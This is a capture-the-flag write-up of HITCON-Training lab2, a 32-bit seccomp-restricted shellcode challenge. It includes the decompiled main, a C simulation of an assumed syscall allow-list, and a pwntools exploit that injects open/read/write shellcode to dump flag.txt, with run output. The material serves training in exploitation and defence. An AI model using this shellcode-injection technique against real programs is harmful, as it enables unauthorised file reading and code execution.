[HITCON-Training] lab2

2019. 10. 30. 21:32

HITCON-Training lab2

Summary

  • 32bit

  • shellcode

Analysis

main

int __cdecl main(int argc, const char **argv, const char **envp)
{
  orw_seccomp();
  printf("Give my your shellcode:");
  read(0, &shellcode, 0xC8u);
  ((void (*)(void))shellcode)();
  return 0;
}

Because of seccomp, ordinary shellcode does not work. Instead, write shellcode that reads flag.txt directly and prints it.
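How a seccomp allow-list of the kind orw_seccomp() suggests decides which syscalls survive, as an added example that is not code from the original post or from the challenge binary. The rule set is an assumption inferred from the function name (the real filter is not shown on this page), the names insn, scdata, orw_filter, seccomp_eval and orw_allows are hypothetical, and the classic-BPF program is evaluated in user space rather than installed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
/* Values mirror <linux/filter.h>, <linux/seccomp.h> and <linux/audit.h>. */
#define LD_W_ABS  0x20u        /* BPF_LD | BPF_W | BPF_ABS */
#define JEQ_K     0x15u        /* BPF_JMP | BPF_JEQ | BPF_K */
#define RET_K     0x06u        /* BPF_RET | BPF_K */
#define RET_ALLOW 0x7fff0000u  /* SECCOMP_RET_ALLOW */
#define RET_KILL  0x00000000u  /* SECCOMP_RET_KILL */
#define ARCH_I386 0x40000003u  /* AUDIT_ARCH_I386 */
struct insn { uint16_t code; uint8_t jt, jf; uint32_t k; };  /* like struct sock_filter */
struct scdata { uint32_t nr, arch; };  /* first two fields of struct seccomp_data */

/* Assumed allow-list, i386 numbers: open=5, read=3, write=4, exit=1, exit_group=252. */
static const struct insn orw_filter[] = {
    { LD_W_ABS, 0, 0, 4 },          /* A = arch (offset 4) */
    { JEQ_K,    0, 7, ARCH_I386 },  /* any other ABI jumps to KILL */
    { LD_W_ABS, 0, 0, 0 },          /* A = syscall number (offset 0) */
    { JEQ_K,    4, 0, 5 },          /* open       -> ALLOW */
    { JEQ_K,    3, 0, 3 },          /* read       -> ALLOW */
    { JEQ_K,    2, 0, 4 },          /* write      -> ALLOW */
    { JEQ_K,    1, 0, 1 },          /* exit       -> ALLOW */
    { JEQ_K,    0, 1, 252 },        /* exit_group -> ALLOW, anything else -> KILL */
    { RET_K,    0, 0, RET_ALLOW },
    { RET_K,    0, 0, RET_KILL },
};

/* Interpreter for the three opcodes used above; unknown opcodes fail closed. */
uint32_t seccomp_eval(const struct insn *f, size_t n, struct scdata d) {
    uint32_t A = 0;
    for (size_t pc = 0; pc < n; pc++) {
        switch (f[pc].code) {
        case LD_W_ABS: A = (f[pc].k == 0) ? d.nr : (f[pc].k == 4) ? d.arch : 0; break;
        case JEQ_K:    pc += (A == f[pc].k) ? f[pc].jt : f[pc].jf; break;
        case RET_K:    return f[pc].k;
        default:       return RET_KILL;
        }
    }
    return RET_KILL;
}
int orw_allows(uint32_t arch, uint32_t nr) {
    struct scdata d = { nr, arch };
    return seccomp_eval(orw_filter, sizeof orw_filter / sizeof *orw_filter, d) == RET_ALLOW;
}
int main(void) {
    const uint32_t nr[] = { 5, 3, 4, 11, 2 };  /* open, read, write, execve, fork */
    for (size_t i = 0; i < sizeof nr / sizeof *nr; i++)
        printf("nr %3u -> %s\n", (unsigned)nr[i], orw_allows(ARCH_I386, nr[i]) ? "ALLOW" : "KILL");
    return 0;
}
```

The architecture check at the top matters because syscall numbers differ between ABIs; a filter that compares only the number can be evaluated against the wrong table.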

Exploit

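from pwn import *

e = ELF("./orw.bin")
p = process("./orw.bin")

# shellcraft and asm() generate code for the architecture set here
context(arch="i386", os="linux")

# seccomp rules out ordinary shellcode, so open flag.txt, read it, and write it to stdout
payload = ""
payload += shellcraft.open("flag.txt")         # the file descriptor comes back in eax
payload += shellcraft.read("eax", "esp", 100)  # read up to 100 bytes onto the stack
payload += shellcraft.write(1, "esp", 100)     # always writes 100 bytes, so stack bytes follow the flag

p.recvuntil(b":")
p.send(asm(payload))
p.interactive()
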
cg10036@cg10036-virtual-machine:~/HITCON-Training/LAB/lab2$ p ex.py 
[*] '/home/cg10036/HITCON-Training/LAB/lab2/orw.bin'
  Arch:     i386-32-little
  RELRO:   Partial RELRO
  Stack:   Canary found
  NX:       NX disabled
  PIE:     No PIE (0x8048000)
  RWX:     Has RWX segments
[+] Starting local process './orw.bin': pid 3563
[*] Switching to interactive mode
FLAG{THIS_IS_EXAMPLE_FLAG}
\x0076ڷ\x00Ѳ𑳷\x0076ڷ\x00\x00\x00Չ\xb8\xff݉\xb8\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00Ѳ񃭷򡸷\x00\x00Ѳ𑳷\x00$   [*] Got EOF while reading in interactive
$
[*] Interrupted
[*] Process './orw.bin' stopped with exit code -11 (SIGSEGV) (pid 3563)

